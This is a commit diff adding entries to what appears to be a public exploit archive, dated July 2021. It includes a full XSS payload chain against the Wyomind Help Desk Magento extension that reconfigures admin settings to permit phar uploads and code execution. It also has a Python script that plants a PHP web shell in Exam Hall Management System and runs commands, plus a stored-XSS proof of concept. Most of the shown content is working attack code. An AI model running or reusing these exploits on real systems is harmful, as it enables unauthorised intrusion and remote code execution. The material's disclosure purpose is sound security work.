DB: 2021-07-09

5 changes to exploits/shellcodes Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS) Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated) Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
2021-07-09 05:01:53 +00:00 · 2021-07-09 05:01:53 +00:00 · 57766a2587
commit 57766a2587
parent c19f7edfef
6 changed files with 605 additions and 0 deletions
--- a/exploits/multiple/webapps/50113.txt
+++ b/exploits/multiple/webapps/50113.txt
@ -0,0 +1,218 @@
+# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) 
+# Date: 2021-07-07
+# Exploit Author: Patrik Lantz
+# Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html
+# Version: <= 1.3.6
+# Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2
+
+
+The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and  unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.
+
+A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. 
+The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable
+the delivery of the XSS payload:
+
+POST /helpdesk/customer/ticket_save/ HTTP/1.1
+Host: <redacted>
+Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635
+Content-Length: 683
+Origin: https://<redacted>
+Connection: close
+Referer: https://<redacted>/helpdesk/customer/ticket_view/
+Cookie: <redacted>
+Upgrade-Insecure-Requests: 1
+
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="form_key"
+
+<redacted>
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="object"
+
+Hello
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="message_cc"
+
+
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="content"
+
+<p><script>alert(1)</script></p>
+-----------------------------243970849510445067673127196635
+Content-Disposition: form-data; name="hideit"
+
+
+-----------------------------243970849510445067673127196635--
+
+
+
+The following XSS payload shown below can be used to trigger 
+
+1) Enabling file attachments in ticket messages
+2) Adding 'phar' to allowed file extensions
+3) Setting the attachment directory to 'helpdesk/files/../../../pub'
+
+
+<script>
+function successListener(e) {    
+	var doc = e.target.response
+	var action=doc.getElementById('config-edit-form').action;
+	
+	function submitRequest()
+	{
+	var formKey = FORM_KEY;
+	var xhr = new XMLHttpRequest();
+	xhr.open("POST", action, true);
+	xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");
+	xhr.withCredentials = true;
+	var body = "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"form_key\"\r\n" + 
+	  "\r\n" + 
+	  formKey + "\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + 
+	  "\r\n" + 
+	  "\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "2\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + 
+	  "\r\n" + 
+	  "3\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + 
+	  "\r\n" + 
+	  "10000\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Support - My Tickets\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + 
+	  "\r\n" + 
+	  "jpeg,gif,png,pdf,phar\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + 
+	  "\r\n" + 
+	  "helpdesk/files/../../../pub\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + 
+	  "\r\n" + 
+	  "2M\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + 
+	  "\r\n" + 
+	  "4M\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + 
+	  "\r\n" + 
+	  "1\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Your message has been sent to the support team.\r\n" + 
+	  "Here is the message content:\x3cbr/\x3e\r\n" + 
+	  "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Kind Regards,\r\n" + 
+	  "The Support Team.\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + 
+	  "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
+	  "Regards,\r\n" + 
+	  "The Support Team.\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + 
+	  "\r\n" + 
+	  "0\r\n" + 
+	  "-----------------------------14303502862141221692667966053\r\n" + 
+	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + 
+	  "\r\n" + 
+	  "You received a new message from a customer.\r\n" + 
+	  "-----------------------------14303502862141221692667966053--\r\n";
+	var aBody = new Uint8Array(body.length);
+	for (var i = 0; i < aBody.length; i++)
+	aBody[i] = body.charCodeAt(i); 
+	xhr.send(new Blob([aBody]));
+	}
+	submitRequest();
+}
+	
+var request = new XMLHttpRequest();  
+request.onload = successListener;    
+request.responseType = 'document';
+request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true);  
+request.send();
+</script> 
+
+After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting
+
+https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar 
+
+ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the 
+URL, for example: 
+
+https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/
+
+and the messageId can be identified by hovering over the uploaded file link which will be similar to 
+
+https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar
+
+in this case, the messageId is 40.
--- a/exploits/php/webapps/50111.py
+++ b/exploits/php/webapps/50111.py
@ -0,0 +1,61 @@
+# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
+# Exploit Author: Davide 'yth1n' Bianchin
+# Contacts: davide dot bianchin at dedagroup dot it
+# Original PoC: https://exploit-db.com/exploits/50103
+# Date: 06.07.2021
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
+# Version: 1.0
+# Tested on: Kali Linux
+
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+import os
+import sys
+import string
+import random
+import time
+
+host = 'localhost' #CHANGETHIS
+path = 'SourceCode' #CHANGETHIS
+
+url = 'http://'+host+'/'+path+'/pages/save_user.php'
+
+def id_generator(size=6, chars=string.ascii_lowercase):
+	return ''.join(random.choice(chars) for _ in range(size))+'.php'
+
+if len(sys.argv) == 1:
+    print("#########")
+    print("Usage: python3 examhallrce.py command")
+    print("Usage: Use the char + to concatenate commands")
+    print("Example: python3 examhallrce.py whoami")
+    print("Example: python3 examhallrce.py ls+-la")
+    print("#########")
+    exit()
+
+
+filename = id_generator()
+print("Generated "+filename+ " file..")
+time.sleep(2)
+print("Uploading file..")
+time.sleep(2)
+
+   
+
+
+def reverse():
+    command = sys.argv[1]
+    multipart_data = MultipartEncoder({
+        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
+        'btn_save': ''
+        })
+    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})   
+    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' 
+    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
+    print("Success, file correctly uploaded at: " +endpoint+ "")
+    time.sleep(1) 
+    print("Executing command in 1 seconds:\n")
+    time.sleep(1)
+    os.system("curl -X GET "+urlo+"")
+
+reverse()
--- a/exploits/php/webapps/50112.txt
+++ b/exploits/php/webapps/50112.txt
@ -0,0 +1,25 @@
+# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
+# Date: 07 July 2021
+# Exploit Author: Subhadip Nag (mrl0s3r)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
+# Tested on: Server: XAMPP
+
+# Description #
+
+Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data.
+
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/ERMSP/erms/loginerms.php
+2) Login: Login as a User(given username and password)
+3) Go To Edit My Education and Edit My Exp
+4) Enter the payload: <script>alert(1)</script>
+5) Click Update
+6) Go to 'My Education' option
+7) Our XSS attack successful
+
+# PoC image
+1) https://ibb.co/LS78xjX
+2) https://ibb.co/9G0Pbxb
--- a/exploits/php/webapps/50114.py
+++ b/exploits/php/webapps/50114.py
--- a/exploits/php/webapps/50115.py
+++ b/exploits/php/webapps/50115.py
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44248,3 +44248,8 @@ id,file,description,date,author,type,platform,port
 50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,
 50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",2021-07-07,faisalfs10x,webapps,php,
 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,
+50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",2021-07-08,"Davide \'yth1n\' Bianchin",webapps,php,
+50112,exploits/php/webapps/50112.txt,"Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)",2021-07-08,"Subhadip Nag",webapps,php,
+50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,
+50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",2021-07-08,faisalfs10x,webapps,php,
+50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php,